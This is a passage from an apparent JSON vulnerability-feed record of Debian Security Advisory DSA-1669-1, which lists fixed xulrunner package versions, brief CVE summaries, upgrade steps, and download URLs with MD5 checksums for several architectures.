"packageFilename": "libmozjs-dev_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnspr4-0d-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libxul0d-dbg_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libxul0d-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libxul0d_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libxul0d", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libmozjs0d-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "spidermonkey-bin_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnspr4-dev_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnspr4-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnspr4-0d_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnspr4-0d", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnss3-0d_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnss3-0d", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libxul-common_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libxul-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "xulrunner_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "xulrunner", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnss3-tools_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnss3-tools", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libmozjs0d_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libmozjs0d", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libnss3-dev_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libnss3-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libsmjs1_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libsmjs1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "1.8.0.15~pre080614h-0etch1", "arch": "all", "packageFilename": "libmozillainterfaces-java_1.8.0.15~pre080614h-0etch1_all.deb", "packageName": "libmozillainterfaces-java", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1669-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nNovember 23, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : xulrunner\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2008-0016 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4065 CVE-2008-4066 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069 CVE-2008-4582 CVE-2008-5012 CVE-2008-5013 CVE-2008-5014 CVE-2008-5017 CVE-2008-5018 CVE-2008-0017 CVE-2008-5021 CVE-2008-5022 CVE-2008-5023 CVE-2008-5024\n\nSeveral remote vulnerabilities have been discovered in Xulrunner, a\nruntime environment for XUL applications. The Common Vulnerabilities\nand Exposures project identifies the following problems:\n\nCVE-2008-0016\n\n Justin Schuh, Tom Cross and Peter Williams discovered a buffer\n overflow in the parser for UTF-8 URLs, which may lead to the\n execution of arbitrary code.\n\nCVE-2008-3835\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLDocument::OnChannelRedirect() could by bypassed.\n\nCVE-2008-3836\n\n "moz_bug_r_a4" discovered that several vulnerabilities in\n feedWriter could lead to Chrome privilege escalation.\n\nCVE-2008-3837\n\n Paul Nickerson discovered that an attacker could move windows\n during a mouse click, resulting in unwanted action triggered by\n drag-and-drop.\n\nCVE-2008-4058\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers.\n\nCVE-2008-4059\n\n "moz_bug_r_a4" discovered a vulnerability which can result in\n Chrome privilege escalation through XPCNativeWrappers.\n\nCVE-2008-4060\n\n Olli Pettay and "moz_bug_r_a4" discovered a Chrome privilege\n escalation vulnerability in XSLT handling.\n\nCVE-2008-4061\n\n Jesse Ruderman discovered a crash in the layout engine, which might\n allow the execution of arbitrary code.\n\nCVE-2008-4062\n\n Igor Bukanov, Philip Taylor, Georgi Guninski and Antoine Labour\n discovered crashes in the Javascript engine, which might allow the\n execution of arbitrary code.\n\nCVE-2008-4065\n\n Dave Reed discovered that some Unicode byte order marks are\n stripped from Javascript code before execution, which can result in\n code being executed, which were otherwise part of a quoted string.\n\nCVE-2008-4066\n\n Gareth Heyes discovered that some Unicode surrogate characters are\n ignored by the HTML parser.\n\nCVE-2008-4067\n\n Boris Zbarsky discovered that resource: URls allow directory\n traversal when using URL-encoded slashes.\n\nCVE-2008-4068\n\n Georgi Guninski discovered that resource: URLs could bypass local\n access restrictions.\n\nCVE-2008-4069\n\n Billy Hoffman discovered that the XBM decoder could reveal\n uninitialised memory.\n\nCVE-2008-4582\n\n Liu Die Yu discovered an information leak through local shortcut\n files.\n\nCVE-2008-5012\n\n Georgi Guninski, Michal Zalewski and Chris Evan discovered that\n the canvas element could be used to bypass same-origin\n restrictions.\n\nCVE-2008-5013\n\n It was discovered that insufficient checks in the Flash plugin glue\n code could lead to arbitrary code execution.\n\nCVE-2008-5014\n\n Jesse Ruderman discovered that a programming error in the\n window.__proto__.__proto__ object could lead to arbitrary code\n execution.\n\nCVE-2008-5017\n\n It was discovered that crashes in the layout engine could lead to\n arbitrary code execution.\n\nCVE-2008-5018\n\n It was discovered that crashes in the Javascript engine could lead to\n arbitrary code execution.\n\nCVE-2008-0017\n \n Justin Schuh discovered that a buffer overflow in http-index-format\n parser could lead to arbitrary code execution.\n\nCVE-2008-5021\n\n It was discovered that a crash in the nsFrameManager might lead to\n the execution of arbitrary code.\n\nCVE-2008-5022\n\n "moz_bug_r_a4" discovered that the same-origin check in\n nsXMLHttpRequest::NotifyEventListeners() could be bypassed.\n\nCVE-2008-5023\n\n Collin Jackson discovered that the -moz-binding property bypasses\n security checks on codebase principals.\n\nCVE-2008-5024\n\n Chris Evans discovered that quote characters were improperly\n escaped in the default namespace of E4X documents.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.0.15~pre080614h-0etch1. Packages for mips will be provided\nlater.\n\nFor the upcoming stable distribution (lenny) and the unstable\ndistribution (sid), these problems have been fixed in version 1.9.0.4-1.\n\nWe recommend that you upgrade your xulrunner packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h.orig.tar.gz\n Size/MD5 checksum: 43763318 269ce29df92d5053f6d0fc659717c18b\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1.diff.gz\n Size/MD5 checksum: 144529 7f517d4bd904df70b6ead61c85e5eb71\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1.dsc\n Size/MD5 checksum: 1984 2f56bfad80749a3af01a185cfc3a19e5\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs-dev_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 37108 ac110712c554bc90e6156ddf375c20e6\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-dev_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 231230 75b9b3c909279253b358fe73c87ae920\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 176254 6bffe2de1c86a23ea69141da310df072\n http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs1_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 37070 a83bac43079f44db9c6a8ba23638481a\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul-dev_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 2637220 39ab7259a30e82173bd736ff4d26b366\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul-common_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 1051896 e9a4021391f5153eaca415b5f6e93fe6\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 1032080 388688d0bfcb0a5c4abde96f9fb24c98\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-dev_1.8.0.15~pre080614h-0etch1_all.deb\n Size/MD5 checksum: 207752 516386bf8588e6210ac121d38cc67308\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 292440 187aad52fc63d5fdca6521359b6a360a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 386628 536f366c637868a9f27746f776d37a31\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 7346254 4b946a8f3cde017ff0580a9a97687e7e\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 765180 673c7bd51731495926293ff92301b327\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 739026 d96d09c1ecbf280a77ee5f4fe4a7d1a3\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 3188906 5cfc3218c50b909a4e64e06d09774224\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 53106 20768cf8e831ad71f45cccb657eb3448\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 71212 0f8fe3e84b4faf38d25347f3dfdc463d\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 302616 01109cc8d78492dbbbcbad4756255e8b\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 162612 9af11053277aa8398ed4852890076b41\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 129930 7b03aa5bcfb76b15d860621806ffbccb\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 905638 3a558f50e394d109e4d306559b48283a\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_alpha.deb\n Size/MD5 checksum: 46017420 d5f238086f7f77270d31a3d34c4b9a35\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 3177838 69775ab87c4c2677faf2fbe8ed1c4617\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 148946 d179d55f788e6fbaf2259446d79c342c\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 356028 7e6147ae3531fb175cdf637a25f4dc33\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 126632 7795ccbd3edeb72623450ec3b0c407f9\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 810296 09a7217cbe1b1180c71ae7b16a306747\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 69360 2e6a6559a22ce55f2b6b9331b0bfbd68\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 755560 ade61fc66030701ba9d62086288403bf\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 278728 9124a96cd6b202d076a35829b542f6f6\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 6343406 7683694615827e8674c59034978b86b1\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 671010 7984141447417ad48f657e5752a197c5\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 45217322 e18a8c41099328f6979c27614a81b83c\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 53340 803733e356f2f74037a6f3a7d9a4a91f\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_amd64.deb\n Size/MD5 checksum: 304624 36ced9e2336ccaa648a15c76707f8645\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 50992 e655c2956e96e317f0a32c4122b34d3b\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 732278 0f2bce0bc1d0b13b36c5b45465516b04\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 44746676 980a58b4e66d48cb8e913a3846081001\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 5368942 8a6560e2302db9686218205d5c347e16\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 290778 305d1c3d9f893d75d6b92e7b02819bdb\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 63054 72ef44af146319f439a44197b7d4743a\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 594214 7c6d64740f289185389b15b790d645ad\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 2969882 9acb7cc81292692bedc12f523fb25f19\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 119110 249f11b4d5c08aa5d1bd4d74221e0c38\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 136886 ce4ac4ba2050790518c8528c2a415f02\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 326184 5c4f59cedea7db6e7dd5d9a9522c24c7\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 260186 a9ac930957d7416cc7a160b6044f96b3\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_arm.deb\n Size/MD5 checksum: 705170 fbdb65410c70fa8805ce72c0c97c179b\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 302322 61f8282f8cd276c69d24fa6824761a4e\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 703692 06452f715efa7e66c5d22e3866db2c0e\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 46134820 cd29259ebf9caf9dca35560e806f984b\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 53462 27cc05a50b56afbe49b5fa3b30672e58\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 390962 9fed7a335de83d6333b1c2e5c9bedfea\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 161670 b9c1c8bfdf1db386d301dbb03d5c403c\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 7552110 91b773e5373158755289930d39ff7470\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 132130 8a5c0d6d99049ab1a499c584a602d7dc\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 753050 bc5f4f2723836580fbfbaed5a71272b1\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 287828 b0a84eacece17a811defbb7b30c757f7\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 3104660 47ab34d7126c8f64cbaa269f7a2afdd4\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 70902 67634b0f71a03fd87476396172ccffe7\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_hppa.deb\n Size/MD5 checksum: 874810 ae271a1ca58484ddf43ba14d66387a06\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 5383100 25dfd28aef781b5ca352f0232aa211e9\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 63834 2691c48af147f802e684e030d3e04701\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 44696504 d3f45db182ee59de39c86b5ea12ad01a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 714892 13951abf0a2c9030ed8ff163f6259351\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 296446 b8a9da32c6184afac2f6649ce8ad5847\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 139824 13cb243ffadc155900abb00835a6507b\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 3033280 705838b8f872cd335ce180cbad03cdb1\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 337086 87db12ec21885f3833560b334e1af3e4\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 50868 707ae35a901c3e9ae1ec40c3c00f7921\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 742916 bd2ff5be8f3a94deaf104bafe477a9d3\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 118548 8ce74f7ef876172271c72c3c411cbd33\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 267924 7d8bcf96f9244594b9a937b6224fa097\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_i386.deb\n Size/MD5 checksum: 628432 e109e6b6aa054ced99a8844df67ced17\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 150698 ab8c0d92e7ac8bb48b604d6ea36197e4\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 287530 c9db22cd56cc17dd619cbd95b3b45075\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 532996 b7c0eadd7ddd85642c761e29cf7cafc3\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 755714 eae62df93df4e8bb5f0deda5dd4ec4e9\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 3051824 e516b3a4601b8350faeff14a47b298b2\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 334028 3a0cc332ff6b095193b7c70952d13532\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 45437166 c3a164f9d48b0c96277be51a441915dd\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 1121458 5f97e14d0837fc02241fec88c81f706a\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 80872 a36655812bc3600a00ada31f7b5af8d7\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 9685646 1ec5fef153646e888c1e28c306e0edae\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 57870 97e42348ab45451378fd360df57ee996\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 198742 bbba497dfc3b9e556082c6357e3dfde5\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_ia64.deb\n Size/MD5 checksum: 937264 e538ce36bc43ed941394d13ee0d52a53\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 274964 8cc829f5a01dabeb02357a57f26de510\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 65170 7ca8f4598376b9e35cf62096cd0663aa\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 785530 464969451374f49191184fdd78363633\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 351424 21b9b17a786ee9e8a28bff8e2cb7b067\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 3187334 da69f74749bc9d111d4a1e4597b7a075\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 52554 fd3706c6cfccb0442e3b092e184adfbb\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 118606 3f78ef107edbf118d6da0a504b1a6c90\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 5756448 5d27b51600c5aecf30d82872ea5ef976\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 670678 861a749803d3906cd21d77e8f45ecae6\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 305782 739ba0f2bcb1c8204734225044648734\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 45367986 ff5cbe1732d1dae74bb822119d86a925\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 766946 438965e5962147e88570d0f0502b43fd\n http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614h-0etch1_mipsel.deb\n Size/MD5 checksum: 146350 3cdb4a00d928cd6d222841d961edcaf8\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 124684 defd7a2555c14d3a0f06c971bea7a451\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 810014 20a1a9dbf4a3ad3eb8fd0d35ee64342f\n http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 46948440 e99e9c17fe4fff09ffa231ab61344926\n http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614h-0etch1_powerpc.deb\n Size/MD5 checksum: 3207304 106c8e04e7e69a403629a08113af60b1\n 